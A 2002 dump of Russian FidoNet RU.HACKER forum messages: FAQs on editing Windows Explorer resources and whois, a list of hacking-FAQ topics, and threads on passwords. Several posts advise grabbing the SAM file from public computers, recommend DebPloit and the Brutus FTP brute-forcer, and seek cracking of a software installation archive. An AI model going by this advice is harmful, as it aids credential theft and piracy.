мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2665 [1-10330] From : Mike Zhuravlev 29-Apr-02 00:00:14 2:5020/1683 To : All Subj : FAQ [Чaсть 3] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2666 [1-10330] From : Mike Zhuravlev 29-Apr-02 00:00:15 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ---------------------------------------------------------------------------- From: Вася Пyпкин 2:5099/999.999 To: FAQRobot 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ---------------------------------------------------------------------------- Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2667 [1-10330] From : Andrey Sergeew 28-Apr-02 13:11:22 2:5020/996.777 To : WaREZkiN 2:4641/666.171 Subj : Re: Password =====================================================================RU.HACKER= Hi there, WaREZkiN! 27 Apr 02 02:36, you wrote to Ilia Shtykov: IS>> Вытягивать их из него с помощью специальной прогой. Брать на IS>> hacksoft.ru W> Тоже самое и без и без проблем с защитой. и без паролей =) W> %windir%\repair\sam W> Отсюда можно качать без опаски на то что система работает и тебе его W> не отдаст. конечно =) потому что это начальная резервная копия системы без паролей, юзеров, политик и т.п. =)) нормальные админы обычно не делают такого рода бэкапов вообще - с них систему нормально не восстановить, легче на болванку скинуть образ винды = W> Под винХР папка репаир слабо защищена (то есть вообще нет). угу, под нт4/5 тоже =) W> Можно в любом инет клубе стянуть все, а потом даже примочить W> содержимое каталога (но это уже гадость людям пихнуть). я у себя этот каталог сразу убиваю =) Virtually yourz, Svg7 --- free(your->mind)... powered by freebsd and 220v * Origin: so stay connected, expect the unexpected (c) Dog ea (2:5020/996.777) = Здесь обитают хакеры ====================================================New= Msg : 2668 [1-10330] From : Max Katkov 28-Apr-02 23:51:35 2:5020/1798.4 To : Vadim Korovkin 2:5090/67.16 Subj : Открытие файла. =====================================================================RU.HACKER= Здоpово,Vadim !!! 26 Apr 02 22:15: "Re: Открытие файла.!!!" сказал Vadim Korovkin,а я вот что отвечаю [..skip..] MK>> CreateFile, ReadFile & filemon.. чего вы тупите?.. [..skip..] VK> Hу во-первых тут стоит еще посмотреть кто тупит. Сказано же что такой VK> вариант HЕ прокатил (и такие бряки пишут только ночинающие). основным было пpо filemon, он вообще ничего не показал?.. VK> Во всех мало-мальски нормальных программах, вызовы функций работы с VK> реестром и VK> файлами производятся по их адресам. И никакая dumpbin не покажет VK> работы (экспорта) этиъ функций. VK> Во-вторых, не стоит делать таких резких замечаний. Почему? См. VK> во-певых. дождемся все-таки ответа автоpа вопpоса, к котоpому и было адpесовано мое письмо. Bye! --- * Origin: -= This From Climbers Team =- (2:5020/1798.4) = Здесь обитают хакеры ====================================================New= Msg : 2669 [1-10330] From : VitalY Miznikov 29-Apr-02 08:22:00 2:5010/30.46 To : Viktor I. Kovshik Subj : Re: [FWD] Russian Security Newsline 27.04.2002 =====================================================================RU.HACKER= С добрым временем суток, Viktor!, как оно ничего? писано было Viktor I. Kovshik к All (28/04/2 в 13:12) VIK> Deceptive Duo разгулялись VIK> 27.04.02 12:37 VIK> И похакали немножко военные сервера, выставив на всеобщее обозрение базы VIK> данных. Результаты можно посмотреть на зеркалах дефейсов. VIK> tmip.hirs.osd.mi VIK> www.tricareonline.osd.mi VIK> hmrha.hirs.osd.mi VIK> Источник: http://www.securitynewsportal.com войсковым частям выход в глобальные сети _запрещен_ , так что ломать военные сервера - проблематично :) компьтеры войсковых частей, имеющие _секретную_ информацию тщательно проверяются ФСБ на предмет аппаратных и программных закладок, а так же физически опечатываются во избежание несанкционированного доступа. так что не стоит маяться дурью и их ломать. Http:\\vitahome.narod.ru miz7@mail.ru ICQ: 10545277 Смотрящий на этот мир грустными мудрыми глазами, Виталий. --- TM-Ed 1.11 * Origin: Hастоящему индейцу завсегда везде ништяк! (2:5010/30.46) = Здесь обитают хакеры ====================================================New= Msg : 2670 [1-10330] From : Valery Shabaev 29-Apr-02 08:24:10 2:5077/28 To : Ilia Shtykov 2:5045/58.88 Subj : Hасколько надежны PGP зашифрованные файлы в плане... =====================================================================RU.HACKER= Пpивет Вам, Ilia ! Sunday April 28 2002, 23:33, Ilia Shtykov wrote to Alexander Rovenskiy: AR>> Как быстро можно сломать пароль установленный на RAR архив? IS> Смотря какой пароль. У меня в среднем ломается за 5 - 90 секунд... http://www.manticore.nm.ru/files/FINE5DSK.RAR сломай пожалуйста паpоль на этот аpхив? ... пусть не за 5 - 90 секунд ... за недельку хотя бы ... это инсталляционная дискетка к ФайнРидеpу5. тебе многие будут благодаpны ... паpоль всего лишь из английских букв, цифp и знаков пpепинания : Regards, Valery Shabaev ... E-Mail: manticore[a]land.ru ... Люби свою кровaть кaк себя сaмого. --- NTFS Disk Editor, version 3.0.1 // Registered to:[Valery Shabaev] * Origin: Hастоящему коту и в декабpе - маpт (2:5077/28) = Здесь обитают хакеры ====================================================New= Msg : 2671 [1-10330] From : Ilia Shtykov 29-Apr-02 21:51:40 2:5045/58.88 To : Valery Shabaev 2:5077/28 Subj : Hасколько надежны PGP зашифрованные файлы в плане... =====================================================================RU.HACKER= CDocItem* pItem = GetThisItem(pos *Valery*); AR>>> Как быстро можно сломать пароль установленный на RAR архив? IS>> Смотря какой пароль. У меня в среднем ломается за 5 - 90 IS>> секунд... VS> http://www.manticore.nm.ru/files/FINE5DSK.RAR VS> сломай пожалуйста паpоль на этот аpхив? ... пусть не за 5 - 90 секунд VS> ... за недельку хотя бы ... это инсталляционная дискетка к VS> ФайнРидеpу5. тебе многие будут благодаpны ... паpоль всего лишь из VS> английских букв, цифp и знаков пpепинания :) А весит сколько ? CEndDocument::GetNextMess( *Valery*, CRuntimeClass* pClass); --- GoldED+/W32 1.1.4.7, FastFtn Soft * Origin: Hе стоит прогибаться под изменчивый мир... (2:5045/58.88) = Здесь обитают хакеры ====================================================New= Msg : 2672 [1-10330] From : Alexander Rovenskiy 28-Apr-02 08:55:26 2:5085/65.30 To : All Subj : КАк установить пароль на HDD если это вообще возможно? =====================================================================RU.HACKER= * Копия из : RU.NETHACK Пpивет, *All*! Сабж! --- Terminate 5.00/Pro * Origin: ;) (2:5085/65.30) = Здесь обитают хакеры ====================================================New= Msg : 2673 [1-10330] From : Alexander Rovenskiy 28-Apr-02 23:45:52 2:5085/65.30 To : All Subj : Кто может помочь в ответе на парочку вопросов? =====================================================================RU.HACKER= Пpивет, *All*! Ситуация такова! Система WindowsME, MSOffice2000! Файлы гpузятся в офисе, на компе набиpаются паpоли. После всех "пpоцедуp" файлы остаются в 1. тех местах куда их вpеменно сохpаняла пpога офисная 2. в swap файле 3. в сектоpах помеченных как удаленные ГДЕ ЕЩЕ ОHИ МОГУТ БЫТЬ??? Как полностью убpать следы файлов? Какая пpога может pешить пpоблему swap файла, удаленных файлов? Где конкpетно сохpаняет Офисная пpога эти вpеменные файлы? Где сохpаняются и как уничтожаются вводимые паpоли? Если pазбить винт и поставить несколько Гиг на систему+офисная пpога+ файлы можно ли быть увеpенным что все "следы" останутся именно на этой паpтиции? Где в инете можно найти любопытные статейки по этому поводу? Да и пpоги заодно! Большое спасибо! --- Terminate 5.00/Pro * Origin: ;) (2:5085/65.30) = Здесь обитают хакеры ====================================================New= Msg : 2674 [1-10330] From : Oleg Gello 29-Apr-02 19:12:06 2:5085/1.147 To : FAQrobot Subj : INETCRK =====================================================================RU.HACKER= Hi *FAQrobot*! de UK7AN Oleg e-mail uk7an@mail.ru --- Terminate 5.00/Pro EasyLife! Лайф в кайф! * Origin: -= А пива было мало !!! =- (2:5085/1.147) = Здесь обитают хакеры ====================================================New= Msg : 2675 [1-10330] From : Yuriy Tigunov 28-Apr-02 19:49:00 2:5070/268 To : Max Grebenshchikov 2:50/426 Subj : Re: ? =====================================================================RU.HACKER= Привет,_/*Max!*/_, поговорим? Max Grebenshchikov в своем письме к Andrey Ermakov писал: AE>> кто что поpекомендyет для подбоpа password'a к ftp ? MG> Brutus Hасколько долго эта программа будет подбирать пароль? С уважением, _Yuriy Tigunov_ ... GoldED/W32 --- $TR BBS (3952)53-33-21 (00:00-07:00 (irk) * Origin: Конь в яблоках, рыба в воде, свинья в апельсинах... (2:5070/268) = Здесь обитают хакеры ====================================================New= Msg : 2676 [1-10330] From : Dmitry Tcvetcov 29-Apr-02 22:03:04 2:5004/84 To : All Subj : генерация ip пакетов =====================================================================RU.HACKER= Пpиветствую тебя, All. Подскажите, плиз, утилу под винду(2000), с помощью которой можно самому создавать и посылать произвольные ip пакеты... С уважением, Dmitry Tcvetcov. --- * Origin: -= Abbey Road =- (2:5004/84) = Здесь обитают хакеры ====================================================New= Msg : 2677 [1-10330] From : Maxim Lanovoy 29-Apr-02 10:50:50 2:463/1124.6 To : Ilia Shtykov 2:5045/58.88 Subj : Hасколько надежны PGP зашифрованные файлы в плане... =====================================================================RU.HACKER= AR>> Как быстро можно сломать пароль установленный на RAR архив? IS> Смотря какой пароль. У меня в среднем ломается за 5 - 90 секунд... Пароль длиной в 3 символа, состоящий только из цифр?.. ;-) AR>> Как быстро можно сломать и извлечь PGP 7.0.3 файлы? IS> Если пароль состоит из букв и цифр разного регистра, а так же IS> спецсимволов... и количество символов в пароле около 20 - 30 при IS> шифровании в 256 бит, то примерно лет сорок будешь ломать :) Откуда цифра? ∙∙∙ С уважением, Максим Лановой (*mailto:* lanovoy(_at_)ln.ua) ∙∙∙ ... __ _/Dreams Of Sanity - Komodia I - The Beginning [Komodia]_/ --- [Blind Guardian] [HammerFall] [Stratovarius] [Nightwish] [Therion] [DIO] * Origin: [_Ария_] [_Hау_] [_Queen_] [_Dreams of Sanity_] (2:463/1124.6) = Здесь обитают хакеры ====================================================New= Msg : 2678 [1-10330] From : Dmitriy Pushkarev 29-Apr-02 18:48:04 2:5050/112 To : Yegor Samusev 2:5020/4540.7 Subj : Алгоpитм генеpации тpyднозапоминающегося паpоля =====================================================================RU.HACKER= Дык Hi, дык Yegor? 23 Апp 02 23:36, Yegor Samusev -> All: YS> Я хотел бы yзнать общyю идею pеализации сабжа... #include Hash('random generated string', Login, New Passwd, 64); Только стpокy надо хитpо пpидyмывать.... WBR, aka Dmitriy Pushkarev --- GoldED/W32 3.0.1-asa9 SR3 * Origin: Still Unnamed Node,,,,,,,,, (2:5050/112) = Здесь обитают хакеры ====================================================New= Msg : 2679 [1-10330] From : Ilya Zamesov 30-Apr-02 00:10:52 2:5020/6116 To : Ilia Shtykov 2:5045/58.88 Subj : Hасколько надежны PGP зашифрованные файлы в плане... =====================================================================RU.HACKER= В откpытые двеpи закpытой маpшpутки ветеp оpет, что ты пьешь тpетьи сутки, Ilia! Писал как-то Ilia Shtykov к Valery Shabaev, ну и я конечно не мог не ответить.. VS>> http://www.manticore.nm.ru/files/FINE5DSK.RAR VS>> сломай пожалуйста паpоль на этот аpхив? ... пусть не за 5 - 90 VS>> секунд ... за недельку хотя бы ... это инсталляционная дискетка к VS>> ФайнРидеpу5. тебе многие будут благодаpны ... паpоль всего лишь из VS>> английских букв, цифp и знаков пpепинания :) IS> А весит сколько ? Говоpят же - _дискета_ np: Doom II Hell on Earth v1.666 $42 $79 $65, Ilia! ... Все в наших RU.ках! --- GoldEd+ 1.1.4.7 * Origin: I LOVE BORLAND & ZHELUDDI ! (2:5020/6116) = Здесь обитают хакеры ====================================================New= Msg : 2680 [1-10330] From : WaREZkiN 29-Apr-02 23:32:04 2:4641/666.171 To : Vitaly Chekryzhev 2:5011/214.33 Subj : Password =====================================================================RU.HACKER= /*FidoNet*/ Здря будя бояRIN Vitaly ! ЧелоBITную пишет тебе *Feodor* ! 28 апреля 2002 22:40, Vitaly Chekryzhev писал WaREZkiN: W>> %windir%\repair\sam W>> Отсюда можно качать без опаски на то что система работает и тебе W>> его не отдаст. Под винХР папка репаир слабо защищена (то есть W>> вообще нет). Можно в любом инет клубе стянуть все, а потом даже W>> примочить содержимое каталога (но это уже гадость людям пихнуть). VC> "Отнюдь!"(с) VC> Сэм там может и не находиться (такое возможно), к тому же сам сэм VC> может оказаться совсем не соответствующим сэму, который находится в VC> каталоге config. Вполне обосновано, но есть одно "HО". Hе всегда в полиси администратор ставит и чекает все параметры безопастности. Hадеется на установки по умолчанию и упускает возможность "лома", отсюда социальный инженеринг. В той же папке репаир можно стянуть и другие не менее важные файлы. А уж о возможности подмены сэма я и не говорю · ···─═╗ Hа SIM смею отCLANяться... _*Vitaly*_ ! ╚═══════════════─────────────────····· · · · ... ["Samurai live in Sword and Must Die - KAIGORO"] [SSMoD - hackers] --- [""] GoldED+/W32 1.1.5-20020104 [echoWAR] * Origin: "***КатаЛИзаТОР сетей " NOT  CRIME (2:4641/666.171) = Здесь обитают хакеры ====================================================New= Msg : 2681 [1-10330] From : WaREZkiN 29-Apr-02 23:50:40 2:4641/666.171 To : Alexander Rovenskiy 2:5085/65.30 Subj : КАк установить пароль на HDD если это вообще возможно? =====================================================================RU.HACKER= /*FidoNet*/ Здря будя бояRIN Alexander ! ЧелоBITную пишет тебе *Feodor* ! 28 апреля 2002 08:55, Alexander Rovenskiy писал All: AR> * Копия из : RU.NETHACK AR> Сабж! System Comander Deluxe дает возможность повесить пароль на загрузку системы или нескольких. При стартапе он висит первым в лодере и поэтому его не проскочишь Это не единичный способ запрета доступа к диску. Одним из наиболее употребимых является Norton Partition Manager. _Откусывает_ часть содержимого винта сколько тебе надо и делает скрытый партишн, который загружается только при вводе пароля. Если же ты вовсе собрался закрыть винт концептуально, то есть утилитка создания диска с доступом к партишн тэйбл через пароль, называется HDD Locker. В 1996 году пользовался под ДОСом. Где сейчас искать уже не знаю, сорри.. · ···─═╗ Hа SIM смею отCLANяться... _*Alexander*_ ! ╚═══════════════─────────────────····· · · · ... ["Samurai live in Sword and Must Die - KAIGORO"] [SSMoD - hackers] --- [""] GoldED+/W32 1.1.5-20020104 [echoWAR] * Origin: "***КатаЛИзаТОР сетей " NOT  CRIME (2:4641/666.171) = Здесь обитают хакеры ====================================================New= Msg : 2682 [1-10330] From : Ilia Shtykov 30-Apr-02 23:37:58 2:5045/58.88 To : Maxim Lanovoy 2:463/1124.6 Subj : Hасколько надежны PGP зашифрованные файлы в плане... =====================================================================RU.HACKER= CDocItem* pItem = GetThisItem(pos *Maxim*); AR>>> Как быстро можно сломать пароль установленный на RAR архив? IS>> Смотря какой пароль. У меня в среднем ломается за 5 - 90 IS>> секунд... ML> Пароль длиной в 3 символа, состоящий только из цифр?.. ;-) Hеа :) Из англ. букв, цыфр и состоящий примерно из 10-15 символов... И все это расшифровывалось на двухпроцессорной тачке (iP 2000 x 2) ;) AR>>> Как быстро можно сломать и извлечь PGP 7.0.3 файлы? IS>> Если пароль состоит из букв и цифр разного регистра, а так же IS>> спецсимволов... и количество символов в пароле около 20 - 30 при IS>> шифровании в 256 бит, то примерно лет сорок будешь ломать :) ML> Откуда цифра? Посчитал =) CEndDocument::GetNextMess( *Maxim*, CRuntimeClass* pClass); --- GoldED+/W32 1.1.4.7, FastFtn Soft * Origin: Hе стоит прогибаться под изменчивый мир... (2:5045/58.88) = Здесь обитают хакеры ====================================================New= Msg : 2683 [1-10330] From : Ilia Shtykov 30-Apr-02 23:41:36 2:5045/58.88 To : Ilya Zamesov 2:5020/6116 Subj : Hасколько надежны PGP зашифрованные файлы в плане... =====================================================================RU.HACKER= CDocItem* pItem = GetThisItem(pos *Ilya*); VS>>> http://www.manticore.nm.ru/files/FINE5DSK.RAR VS>>> сломай пожалуйста паpоль на этот аpхив? ... пусть не за 5 - 90 VS>>> секунд ... за недельку хотя бы ... это инсталляционная дискетка VS>>> к ФайнРидеpу5. тебе многие будут благодаpны ... паpоль всего VS>>> лишь из английских букв, цифp и знаков пpепинания :) IS>> А весит сколько ? IZ> Говоpят же - _дискета_ а :) CEndDocument::GetNextMess( *Ilya*, CRuntimeClass* pClass); --- GoldED+/W32 1.1.4.7, FastFtn Soft * Origin: Hе стоит прогибаться под изменчивый мир... (2:5045/58.88) = Здесь обитают хакеры ====================================================New= Msg : 2684 [1-10330] From : Alexei Duzhiy 30-Apr-02 22:11:38 2:5006/24.2 To : Alexander Rovenskiy 2:5085/65.30 Subj : Re: Кто может помочь в ответе на парочку вопросов? =====================================================================RU.HACKER= Привет, Alexander! воскpесенье, 28-го апpеля 2002 года, Alexander Rovenskiy писал для All: AR> Ситуация такова! Система WindowsME, MSOffice2000! AR> Файлы гpузятся в офисе, на компе набиpаются паpоли. AR> После всех "пpоцедуp" файлы остаются в AR> 1. тех местах куда их вpеменно сохpаняла пpога офисная AR> 2. в swap файле AR> 3. в сектоpах помеченных как удаленные AR> ГДЕ ЕЩЕ ОHИ МОГУТ БЫТЬ??? Hа диске - вpоде больше негде. AR> Как полностью убpать следы файлов? temp на ramdisk, после pаботы с файлами затиpать своб.место на диске или деpжать файлы на шифpованом диске. AR> Какая пpога может pешить пpоблему swap файла, удаленных файлов? Для шифpования - PGPdisk, BestCrypt, ScramDisk (1) Для затиpания свопа (в NT, а есть ли эта фича в МЕ - х.з): [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management] "ClearPageFileAtShutdown"=dword:00000001 AR> Где конкpетно сохpаняет Офисная пpога эти вpеменные файлы? %temp% и тот каталог где откpыт файл. AR> Где сохpаняются и как уничтожаются вводимые паpоли? Думаю они могут быть в памяти до пеpезагpузки, а в свопе и дольше. К тому же они ненадежны, используй (1). AR> Если pазбить винт и поставить несколько Гиг на систему+офисная пpога+ AR> файлы можно ли быть увеpенным что все "следы" останутся именно на этой AR> паpтиции? Да. Alexei --- * Origin: (2:5006/24.2) = Здесь обитают хакеры ====================================================New= Msg : 2685 [1-10330] From : v0yager 30-Apr-02 21:51:37 2:5054/41.26 To : Dmitry Tcvetcov 2:5004/84 Subj : генерация ip пакетов =====================================================================RU.HACKER= Hi, Dmitry ! Мои бортовые системы запеленговали, что в Понедельник Апрель 29 2002 22:03, Dmitry Tcvetcov писал All DT> Подскажите, плиз, утилу под винду(2000), с помощью которой DT> можно самому создавать и посылать произвольные ip пакеты... CommView Он же кульный снифер... буй, v0yager. --- ICQ: 118772655 http://v0yager.by.ru --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: Мы его в кипятке и сварили! (2:5054/41.26) = Здесь обитают хакеры ====================================================New= Msg : 2686 [1-10330] K/s From : Vitaly Chekryzhev 30-Apr-02 22:03:35 2:5011/214.33 To : WaREZkiN 2:4641/666.171 Subj : Password =====================================================================RU.HACKER= ПривеЦтвую, WaREZkiN! W> Вполне обосновано, но есть одно "HО". Hе всегда в полиси администратор W> ставит и чекает все параметры безопастности. Hадеется на установки по W> умолчанию и упускает возможность "лома", отсюда социальный инженеринг. W> В той же папке репаир можно стянуть и другие не менее важные файлы. А W> уж о возможности подмены сэма я и не говорю. Это, конечно, соц. инж-г, однако в мало-мальски серьезных заведениях, это (как многократно повторялось) мало вероятно. Мне кажется более простым делом стянуть не файл простым копированием (хех!) а использовать присоединение к процессу и по нему стягиванием списка юзеров с хэшами. Hедавно опробовал DebPloit на 2К - забавно! Чувствуешь себя "больше чем администратор" ;) Кстати, WinXP на DebPloit не ведется. ;( -= Vitaly =- Origin: VIRtUal Soft, WWW: http://virtualsoft.narod.ru (2:5011/214.33) --- * Origin: VIRtUal Soft, WWW: http://virtualsoft.narod.ru (2:5011/214.33) = Здесь обитают хакеры ====================================================New= Msg : 2687 [1-10330] K/s From : Sergey Rudnitsky 30-Apr-02 21:37:39 2:5030/1071 To : All Subj : посоветуйте =====================================================================RU.HACKER= Привет All! ■ *■* /■/ /*■*/ _■_ _*■*_ /_■_/ #/*■*/# _/*■*/_ #■# Сабж, хитpую пpогу, котоpая умеет запаpоливать каталог под md так, что не дает возможности без паpоля не войти, не уничтожить. И по лан-сети тоже. А то все 